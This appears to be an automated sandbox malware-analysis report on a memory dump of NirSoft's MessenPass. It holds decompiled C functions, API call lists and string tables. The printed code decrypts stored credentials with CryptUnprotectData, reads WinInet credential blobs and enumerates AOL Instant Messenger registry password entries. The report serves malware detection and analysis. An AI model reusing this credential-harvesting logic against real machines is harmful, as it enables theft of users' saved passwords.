                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
                                          • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
                                          • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
                                          • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
                                          • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
                                          • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                          • API String ID: 2238633743-1621422469
                                          • Opcode ID: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
                                          • Instruction ID: 844867562ca0833f301e0ac6fd14d3db62e181894ebadeef568166b0b2be0524
                                          • Opcode Fuzzy Hash: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
                                          • Instruction Fuzzy Hash: 4FF09774940B48AECB30AF759C09E86BEE1EF9C7007224D2EE2C553650DA799084CE88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00404578(wchar_t** __ebx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v12;
                                          				int _v16;
                                          				signed int _v20;
                                          				intOrPtr _v24;
                                          				signed int _v28;
                                          				intOrPtr _v32;
                                          				void* _v36;
                                          				int _v40;
                                          				void* _v44;
                                          				int _v48;
                                          				intOrPtr _v52;
                                          				intOrPtr _v56;
                                          				char _v60;
                                          				wchar_t* _v64;
                                          				int _v68;
                                          				intOrPtr _v72;
                                          				intOrPtr _v76;
                                          				char _v80;
                                          				intOrPtr _v84;
                                          				char _v88;
                                          				intOrPtr _v92;
                                          				char _v96;
                                          				intOrPtr _v100;
                                          				char _v104;
                                          				intOrPtr _v108;
                                          				char _v112;
                                          				long _v148;
                                          				short _v666;
                                          				void _v1176;
                                          				char _v2200;
                                          				char _v2712;
                                          				void _v3222;
                                          				char _v3224;
                                          				void* __esi;
                                          				int _t118;
                                          				signed int _t122;
                                          				signed int _t123;
                                          				wchar_t* _t127;
                                          				int _t129;
                                          				int _t137;
                                          				void* _t146;
                                          				int _t156;
                                          				wchar_t* _t160;
                                          				wchar_t* _t161;
                                          				void* _t165;
                                          				int _t175;
                                          				wchar_t* _t178;
                                          				wchar_t** _t182;
                                          				signed int _t183;
                                          				void* _t203;
                                          				signed int _t205;
                                          				signed int _t207;
                                          				wchar_t* _t210;
                                          				wchar_t* _t214;
                                          				void* _t215;
                                          				void* _t216;
                                          				intOrPtr* _t217;
                                          				void* _t218;
                                          				void* _t243;
                                          
                                          				_t182 = __ebx;
                                          				_t183 = 9;
                                          				memcpy( &_v148, 0x417fb8, _t183 << 2);
                                          				_t217 = _t216 + 0xc;
                                          				_t118 = wcslen( &_v148);
                                          				_t205 = 0;
                                          				_v68 = _t118;
                                          				 *_t217 = 0xbfe;
                                          				_v3224 = 0;
                                          				memset( &_v3222, 0, ??);
                                          				_t218 = _t217 + 0xc;
                                          				if(E00406B3B() == 0) {
                                          					_push(3);
                                          					_v20 = 4;
                                          				} else {
                                          					_push(4);
                                          					_v20 = 5;
                                          				}
                                          				_pop(_t122);
                                          				_t123 = _t122 << 9;
                                          				_v28 = _t123;
                                          				_t182[1] = _t215 + _t123 - 0xc94;
                                          				 *_t182 =  &_v3224;
                                          				_t182[3] =  &_v2712;
                                          				_t127 = _t215 + (_v20 << 9) - 0xc94;
                                          				_t182[4] =  &_v2200;
                                          				_v64 = _t127;
                                          				_t182[2] = _t127;
                                          				_t203 = 0;
                                          				_v12 = _t205;
                                          				goto L5;
                                          				L6:
                                          				_v24 = _t205;
                                          				_v32 = _t205;
                                          				if(_v12 != _v20) {
                                          					L20:
                                          					if(_v12 != 4) {
                                          						L30:
                                          						if(_v32 == 0) {
                                          							_t137 = _v16;
                                          							if(_t137 > 0x1fa) {
                                          								_t137 = 0x1fa;
                                          							}
                                          							_t99 = _a8 + 4; // 0x8
                                          							_t207 = _v12 << 9;
                                          							memcpy(_t215 + _t207 - 0xc94, _t203 + _t99, _t137);
                                          							 *(_t215 + _t207 - 0xa96) =  *(_t215 + _t207 - 0xa96) & 0x00000000;
                                          							_t218 = _t218 + 0xc;
                                          							if(_v12 == 0) {
                                          								E00406B3B();
                                          							}
                                          						}
                                          						goto L35;
                                          					}
                                          					_t232 = _t182[5] - 4;
                                          					if(_t182[5] != 4) {
                                          						goto L30;
                                          					}
                                          					_v60 = 0;
                                          					_v52 = 0;
                                          					_v56 = 0;
                                          					if(E00404C9D( &_v60, _t232) == 0) {
                                          						L29:
                                          						E00404CE0( &_v60);
                                          						if(_v24 != 0) {
                                          							goto L35;
                                          						}
                                          						goto L30;
                                          					}
                                          					_t146 = 0;
                                          					do {
                                          						 *(_t146 + 0x41eb80) =  *(_t146 + 0x41da78) << 2;
                                          						_t146 = _t146 + 2;
                                          					} while (_t146 < 0x4a);
                                          					_t76 = _a8 + 4; // 0x8
                                          					_v100 = _t203 + _t76;
                                          					_v104 = _v16;
                                          					_v88 = 0x4a;
                                          					_v84 = 0x41eb80;
                                          					if(E00404CF5( &_v60,  &_v104,  &_v88,  &_v48) != 0) {
                                          						_t156 = _v48;
                                          						if(_t156 > 0x1fa) {
                                          							_t156 = 0x1fa;
                                          						}
                                          						memcpy( &_v1176, _v44, _t156);
                                          						_t218 = _t218 + 0xc;
                                          						_v666 = 0;
                                          						LocalFree(_v44);
                                          						_v24 = 1;
                                          					}
                                          					goto L29;
                                          				} else {
                                          					_t210 =  *_t182;
                                          					_t160 = wcschr(_t210, 0x3d);
                                          					if(_t160 != 0) {
                                          						_t31 =  &(_t160[0]); // 0x2
                                          						_t210 = _t31;
                                          					}
                                          					_t161 =  &_v148;
                                          					0x413d86(_t210, _t161, _v68);
                                          					_t218 = _t218 + 0xc;
                                          					_t223 = _t161;
                                          					if(_t161 != 0) {
                                          						goto L20;
                                          					}
                                          					_v80 = 0;
                                          					_v72 = 0;
                                          					_v76 = 0;
                                          					if(E00404C9D( &_v80, _t223) == 0) {
                                          						L19:
                                          						E00404CE0( &_v80);
                                          						goto L20;
                                          					}
                                          					_t165 = 0;
                                          					do {
                                          						 *(_t165 + 0x41e980) =  *(_t165 + 0x41dac8) << 2;
                                          						_t165 = _t165 + 2;
                                          					} while (_t165 < 0x4a);
                                          					_t42 = _a8 + 4; // 0x8
                                          					_v108 = _t203 + _t42;
                                          					_v112 = _v16;
                                          					_v96 = 0x4a;
                                          					_v92 = 0x41e980;
                                          					if(E00404CF5( &_v80,  &_v112,  &_v96,  &_v40) != 0) {
                                          						_t175 = _v40;
                                          						if(_t175 > 0x1fa) {
                                          							_t175 = 0x1fa;
                                          						}
                                          						_t214 = _t215 + _v28 - 0xc94;
                                          						memcpy(_t214, _v36, _t175);
                                          						 *(_t215 + _v28 - 0xa96) =  *(_t215 + _v28 - 0xa96) & 0x00000000;
                                          						_t178 = wcschr(_t214, 0x3a);
                                          						_t218 = _t218 + 0x14;
                                          						if(_t178 != 0) {
                                          							 *_t178 =  *_t178 & 0x00000000;
                                          							wcscpy(_v64,  &(_t178[0]));
                                          						}
                                          						_v32 = 1;
                                          						LocalFree(_v36);
                                          					}
                                          					goto L19;
                                          				}
                                          				L35:
                                          				_v12 = _v12 + 1;
                                          				_t203 = _t203 + _v16 + 4;
                                          				if(E00406B3B() == 0) {
                                          					__eflags = _v12 - 5;
                                          				} else {
                                          					_t243 = _v12 - 6;
                                          				}
                                          				if(_t243 >= 0 || _t203 > _a12) {
                                          					 *((intOrPtr*)( *_a4))(_t182);
                                          					return 1;
                                          				} else {
                                          					_t205 = 0;
                                          					__eflags = 0;
                                          					L5:
                                          					_t129 =  *(_t203 + _a8);
                                          					_v16 = _t129;
                                          					if(_t129 <= _t205) {
                                          						goto L35;
                                          					}
                                          					goto L6;
                                          				}
                                          			}






























































                                          0x0040468c
                                          0x00404742
                                          0x00404745
                                          0x00000000
                                          0x00404745
                                          0x00404692
                                          0x00404694
                                          0x0040469f
                                          0x004046a7
                                          0x004046a8
                                          0x004046b0
                                          0x004046b4
                                          0x004046ba
                                          0x004046cc
                                          0x004046d3
                                          0x004046e1
                                          0x004046e3
                                          0x004046ed
                                          0x004046ef
                                          0x004046ef
                                          0x004046f8
                                          0x00404700
                                          0x00404708
                                          0x00404714
                                          0x00404719
                                          0x0040471e
                                          0x00404720
                                          0x0040472b
                                          0x00404731
                                          0x00404735
                                          0x0040473c
                                          0x0040473c
                                          0x00000000
                                          0x004046e1
                                          0x00404857
                                          0x0040485a
                                          0x0040485d
                                          0x00404868
                                          0x00404870
                                          0x0040486a
                                          0x0040486a
                                          0x0040486a
                                          0x00404874
                                          0x00404885
                                          0x0040488d
                                          0x00404624
                                          0x00404624
                                          0x00404624
                                          0x00404626
                                          0x00404629
                                          0x0040462e
                                          0x00404631
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404631

                                          APIs
                                          • wcslen.MSVCRT ref: 0040459A
                                          • memset.MSVCRT ref: 004045BA
                                          • wcschr.MSVCRT ref: 0040464E
                                          • _wcsncoll.MSVCRT ref: 00404667
                                          • memcpy.MSVCRT ref: 00404700
                                          • wcschr.MSVCRT ref: 00404714
                                          • wcscpy.MSVCRT ref: 0040472B
                                          • memcpy.MSVCRT ref: 004047E3
                                          • LocalFree.KERNEL32(?,?,?,?,?,?), ref: 004047F5
                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0040473C
                                            • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                          • memcpy.MSVCRT ref: 0040483B
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Freememcpy$LibraryLocalwcschr$AddressLoadProc_wcsncollmemsetwcscpywcslen
                                          • String ID: ?L@$Microsoft_WinInet
                                          • API String ID: 1802959924-2674056311
                                          • Opcode ID: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
                                          • Instruction ID: 38d9b8d34b298c31677a0e9ec7c60157448ec74f6fc12d2487dcaf445e5773ed
                                          • Opcode Fuzzy Hash: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
                                          • Instruction Fuzzy Hash: 7FA16DB6D002199BDF10DFA5D844AEEB7B8FF44304F00846BEA19F7281E7789A45CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 004137F3
                                            • Part of subcall function 00413646: strlen.MSVCRT ref: 00413653
                                          • strlen.MSVCRT ref: 0041380F
                                          • memset.MSVCRT ref: 00413849
                                          • memset.MSVCRT ref: 0041385D
                                          • memset.MSVCRT ref: 00413871
                                          • memset.MSVCRT ref: 00413897
                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                            • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                          • memcpy.MSVCRT ref: 004138CE
                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E
                                          • memcpy.MSVCRT ref: 0041390A
                                          • memcpy.MSVCRT ref: 0041391C
                                          • _mbscpy.MSVCRT ref: 004139F3
                                          • memcpy.MSVCRT ref: 00413A24
                                          • memcpy.MSVCRT ref: 00413A36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpymemset$strlen$_mbscpy
                                          • String ID: salu
                                          • API String ID: 3691931180-4177317985
                                          • Opcode ID: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
                                          • Instruction ID: 50f97ef88cf8910c77a3c81ceda6bafe80676b1d4533e7ed44b9b26706654b38
                                          • Opcode Fuzzy Hash: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
                                          • Instruction Fuzzy Hash: 48712DB290011DAADF10EF95DC819DE77B8BF08348F1445BAF548E7141DB78AB888F95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E00403EDF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a117889) {
                                          				intOrPtr* _v8;
                                          				char _v76;
                                          				void _v1099;
                                          				char _v1100;
                                          				void _v2123;
                                          				char _v2124;
                                          				void _v3147;
                                          				char _v3148;
                                          				char _v4172;
                                          				void* __ebx;
                                          				void* __esi;
                                          				void* _t41;
                                          				void* _t42;
                                          				void* _t53;
                                          				void* _t59;
                                          				signed int _t63;
                                          				intOrPtr* _t69;
                                          				void* _t79;
                                          				void* _t82;
                                          				void* _t83;
                                          
                                          				 *__eax =  *__eax + __eax;
                                          				_a117889 = _a117889 + 0xc8;
                                          				 *0x0008F951 =  *((intOrPtr*)(0x8f951)) + 0xc8;
                                          				asm("adc [edx+0x55c30000], dh");
                                          				0x414060(_t79);
                                          				_t69 = 0xc8;
                                          				_v8 = 0xc8;
                                          				E004067EC(_a4, "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">");
                                          				_v1100 = 0;
                                          				memset( &_v1099, 0, 0x3ff);
                                          				_v3148 = 0;
                                          				memset( &_v3147, 0, 0x3ff);
                                          				_v2124 = 0;
                                          				memset( &_v2123, 0, 0x3ff);
                                          				_t83 = _t82 + 0x2c;
                                          				if( *0x41e350 != 0) {
                                          					_push(0x41e350);
                                          					sprintf( &_v3148, "<meta http-equiv='content-type' content='text/html;charset=%s'>");
                                          					_t83 = _t83 + 0xc;
                                          				}
                                          				if( *0x41e34c != 0) {
                                          					0x413d0c( &_v1100, "<table dir="rtl"><tr><td>");
                                          				}
                                          				_t41 =  *((intOrPtr*)( *_t69 + 0x1c))();
                                          				_t63 = 0x10;
                                          				_push(_t41);
                                          				_t42 = memcpy( &_v76, 0x419278, _t63 << 2);
                                          				asm("movsb");
                                          				sprintf( &_v4172,  &_v76,  &_v3148, _t42,  &_v1100);
                                          				E004067EC(_a4,  &_v4172);
                                          				_push("MessenPass");
                                          				_t59 = 6;
                                          				_push(E0040876F(_t59));
                                          				sprintf( &_v2124, "<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>");
                                          				_t53 = E004067EC(_a4,  &_v2124);
                                          				_t90 = _a8 - 4;
                                          				if(_a8 == 4) {
                                          					_t53 = E0040A5A6(_v8, _t90, _a4);
                                          				}
                                          				return _t53;
                                          			}

                                          APIs
                                            • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                            • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                          • memset.MSVCRT ref: 00403F2E
                                          • memset.MSVCRT ref: 00403F42
                                          • memset.MSVCRT ref: 00403F56
                                          • sprintf.MSVCRT ref: 00403F77
                                          • _mbscpy.MSVCRT ref: 00403F93
                                          • sprintf.MSVCRT ref: 00403FCA
                                          • sprintf.MSVCRT ref: 00403FFB
                                          Strings
                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5
                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
                                          • <table dir="rtl"><tr><td>, xrefs: 00403F8D
                                          • MessenPass, xrefs: 00403FE1
                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
                                          • API String ID: 113626815-2158351146
                                          • Opcode ID: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
                                          • Instruction ID: 7e850c38df9f1f0d15d36b6f1642bcd7d5b849b9a1e92852595dac58af72d1cd
                                          • Opcode Fuzzy Hash: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
                                          • Instruction Fuzzy Hash: 963195B2904258BFDB11DBA59C42EDE7BACAF14304F0440ABF508B7141DA799FC88B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E00403EF6(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr* _v8;
                                          				char _v76;
                                          				void _v1099;
                                          				char _v1100;
                                          				void _v2123;
                                          				char _v2124;
                                          				void _v3147;
                                          				char _v3148;
                                          				char _v4172;
                                          				void* __ebx;
                                          				void* __esi;
                                          				void* _t35;
                                          				void* _t36;
                                          				void* _t47;
                                          				void* _t53;
                                          				signed int _t57;
                                          				intOrPtr* _t63;
                                          				void* _t73;
                                          				void* _t74;
                                          
                                          				0x414060();
                                          				_t63 = __ecx;
                                          				_v8 = __ecx;
                                          				E004067EC(_a4, "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">");
                                          				_v1100 = 0;
                                          				memset( &_v1099, 0, 0x3ff);
                                          				_v3148 = 0;
                                          				memset( &_v3147, 0, 0x3ff);
                                          				_v2124 = 0;
                                          				memset( &_v2123, 0, 0x3ff);
                                          				_t74 = _t73 + 0x2c;
                                          				if( *0x41e350 != 0) {
                                          					_push(0x41e350);
                                          					sprintf( &_v3148, "<meta http-equiv='content-type' content='text/html;charset=%s'>");
                                          					_t74 = _t74 + 0xc;
                                          				}
                                          				if( *0x41e34c != 0) {
                                          					0x413d0c( &_v1100, "<table dir="rtl"><tr><td>");
                                          				}
                                          				_t35 =  *((intOrPtr*)( *_t63 + 0x1c))();
                                          				_t57 = 0x10;
                                          				_push(_t35);
                                          				_t36 = memcpy( &_v76, 0x419278, _t57 << 2);
                                          				asm("movsb");
                                          				sprintf( &_v4172,  &_v76,  &_v3148, _t36,  &_v1100);
                                          				E004067EC(_a4,  &_v4172);
                                          				_push("MessenPass");
                                          				_t53 = 6;
                                          				_push(E0040876F(_t53));
                                          				sprintf( &_v2124, "<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>");
                                          				_t47 = E004067EC(_a4,  &_v2124);
                                          				_t80 = _a8 - 4;
                                          				if(_a8 == 4) {
                                          					_t47 = E0040A5A6(_v8, _t80, _a4);
                                          				}
                                          				return _t47;
                                          			}

                                          APIs
                                            • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                            • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                          • memset.MSVCRT ref: 00403F2E
                                          • memset.MSVCRT ref: 00403F42
                                          • memset.MSVCRT ref: 00403F56
                                          • sprintf.MSVCRT ref: 00403F77
                                          • _mbscpy.MSVCRT ref: 00403F93
                                          • sprintf.MSVCRT ref: 00403FCA
                                          • sprintf.MSVCRT ref: 00403FFB
                                          Strings
                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5
                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
                                          • <table dir="rtl"><tr><td>, xrefs: 00403F8D
                                          • MessenPass, xrefs: 00403FE1
                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
                                          • API String ID: 113626815-2158351146
                                          • Opcode ID: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
                                          • Instruction ID: 526b9c6c735ab5766b9493b9c4eecad717bc7371a22eeca07e3dbb649928e63f
                                          • Opcode Fuzzy Hash: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
                                          • Instruction Fuzzy Hash: 6E3187B2900218BADB51DB95DC42EDE7BACAF54304F0440A7F50CB7141DA799FC88B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E004062DB(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				int _v16;
                                          				char _v20;
                                          				char _v24;
                                          				void* _v28;
                                          				void _v1051;
                                          				char _v1052;
                                          				char _v2076;
                                          				char _v3100;
                                          				char _v4124;
                                          				void _v5148;
                                          				void _v6171;
                                          				char _v6172;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				int _t61;
                                          				intOrPtr _t63;
                                          				int _t79;
                                          				int _t81;
                                          				char* _t86;
                                          				void* _t96;
                                          				void* _t102;
                                          				long _t104;
                                          				char _t105;
                                          				void* _t108;
                                          
                                          				0x414060();
                                          				_t61 = E004067BA(_a8);
                                          				_t108 = _t61;
                                          				_t96 = _t102;
                                          				_v28 = _t108;
                                          				if(_t108 != 0xffffffff) {
                                          					_t104 = GetFileSize(_t108, 0);
                                          					if(_t104 > 0) {
                                          						_t3 = _t104 + 1; // 0x1
                                          						_t63 = _t3;
                                          						0x413d5c(_t63);
                                          						_v12 = _t63;
                                          						E00406ED6(_t96, 0, _t108, _t63, _t104);
                                          						 *((char*)(_v12 + _t104)) = 0;
                                          						_v24 = 0;
                                          						_v1052 = 0;
                                          						memset( &_v1051, 0, 0x3ff);
                                          						_t105 = 0;
                                          						_v16 = 0;
                                          						_v20 = 0;
                                          						_v8 = 0;
                                          						_v6172 = 0;
                                          						memset( &_v6171, 0, 0x3ff);
                                          						memset( &_v5148, 0, 0x1000);
                                          						if(E004060C4(_v12, _t96,  &_v1052,  &_v24) != 0) {
                                          							L5:
                                          							while(1) {
                                          								if(_v16 > 0) {
                                          									_t79 = strcmp( &_v1052, 0x4181f4);
                                          									_pop(_t96);
                                          									if(_t79 != 0) {
                                          										__eflags = _v20;
                                          										if(_v20 != 0) {
                                          											__eflags = _t105;
                                          											if(_t105 != 0) {
                                          												__eflags = _t105 - 1;
                                          												if(_t105 != 1) {
                                          													__eflags = _t105 - 2;
                                          													if(_t105 != 2) {
                                          														__eflags = _t105 - 3;
                                          														if(_t105 != 3) {
                                          															__eflags = _t105 - 4;
                                          															if(__eflags != 0) {
                                          																if(__eflags > 0) {
                                          																	__eflags = _v1052;
                                          																	if(_v1052 == 0) {
                                          																		L26:
                                          																		_v8 = 0;
                                          																	} else {
                                          																		_t81 = strcmp( &_v1052, "---");
                                          																		__eflags = _t81;
                                          																		_pop(_t96);
                                          																		if(_t81 == 0) {
                                          																			goto L26;
                                          																		}
                                          																	}
                                          																}
                                          															} else {
                                          																0x413d0c( &_v4124,  &_v1052);
                                          																_pop(_t96);
                                          																E0040623F(_a4,  &_v6172, _a8);
                                          																_v5148 = 0;
                                          																_v4124 = 0;
                                          																_v3100 = 0;
                                          																_v2076 = 0;
                                          															}
                                          														} else {
                                          															_push( &_v1052);
                                          															_t86 =  &_v2076;
                                          															goto L20;
                                          														}
                                          													} else {
                                          														_push( &_v1052);
                                          														_t86 =  &_v5148;
                                          														goto L20;
                                          													}
                                          												} else {
                                          													_push( &_v1052);
                                          													_t86 =  &_v3100;
                                          													goto L20;
                                          												}
                                          											} else {
                                          												_push( &_v1052);
                                          												_t86 =  &_v6172;
                                          												L20:
                                          												0x413d0c();
                                          												_t96 = _t86;
                                          											}
                                          											_t51 =  &_v8;
                                          											 *_t51 = _v8 + 1;
                                          											__eflags =  *_t51;
                                          										}
                                          									} else {
                                          										if(_v20 == 0) {
                                          											_v20 = 1;
                                          										} else {
                                          											_v5148 = 0;
                                          											_v4124 = 0;
                                          											_v3100 = 0;
                                          											_v2076 = 0;
                                          											_v6172 = 0;
                                          										}
                                          										_v8 = 0;
                                          									}
                                          								}
                                          								_v16 = _v16 + 1;
                                          								if(E004060C4(_v12, _t96,  &_v1052,  &_v24) != 0) {
                                          									_t105 = _v8;
                                          									continue;
                                          								}
                                          								goto L29;
                                          							}
                                          						}
                                          						L29:
                                          						0x413d56(_v12);
                                          					}
                                          					_t61 = CloseHandle(_v28);
                                          				}
                                          				return _t61;
                                          			}































                                          APIs
                                            • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                            • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                          • memset.MSVCRT ref: 00406349
                                          • memset.MSVCRT ref: 00406368
                                          • memset.MSVCRT ref: 0040637A
                                          • strcmp.MSVCRT ref: 004063B9
                                          • _mbscpy.MSVCRT ref: 0040644F
                                          • _mbscpy.MSVCRT ref: 0040646B
                                          • strcmp.MSVCRT ref: 004064B3
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004064E5
                                          • CloseHandle.KERNEL32(?), ref: 004064EE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Filememset$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                          • String ID: ---
                                          • API String ID: 3240106862-2854292027
                                          • Opcode ID: 4eeeb57ccc19eee98041d890f7d1814f183a767c446dec136644f82088ed791d
                                          • Instruction ID: 14ccde3f01574b0ce453d66bedc824b09869edf18580a01976bfbb4e6d9b59b2
                                          • Opcode Fuzzy Hash: 4eeeb57ccc19eee98041d890f7d1814f183a767c446dec136644f82088ed791d
                                          • Instruction Fuzzy Hash: A7517572C0415DAACF20DB949C819DEBBBCAF15314F1140FBE509B3181DA389BD98BAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • memset.MSVCRT ref: 0040E768
                                          • memset.MSVCRT ref: 0040E77C
                                          • memset.MSVCRT ref: 0040E790
                                          • memset.MSVCRT ref: 0040E7A8
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • sprintf.MSVCRT ref: 0040E7D8
                                          • strlen.MSVCRT ref: 0040E806
                                          • _mbscpy.MSVCRT ref: 0040E888
                                          • _mbscpy.MSVCRT ref: 0040E89B
                                          • RegCloseKey.ADVAPI32(?), ref: 0040E8ED
                                          Strings
                                          • Password, xrefs: 0040E7DE
                                          • Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users, xrefs: 0040E735
                                          • %s\Login, xrefs: 0040E7D2
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$_mbscpy$CloseEnumOpensprintfstrlen
                                          • String ID: %s\Login$Password$Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users
                                          • API String ID: 1782299107-1248239246
                                          • Opcode ID: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
                                          • Instruction ID: fd41fae155906cc5ed66380c8c1da9a21ab341a1702a4efca81b6986be60196d
                                          • Opcode Fuzzy Hash: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
                                          • Instruction Fuzzy Hash: 4B41C4B2C0011CAEDB21EBA59C41BDEBBBC9F59304F4040EAE549A3101D6399F99CF68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
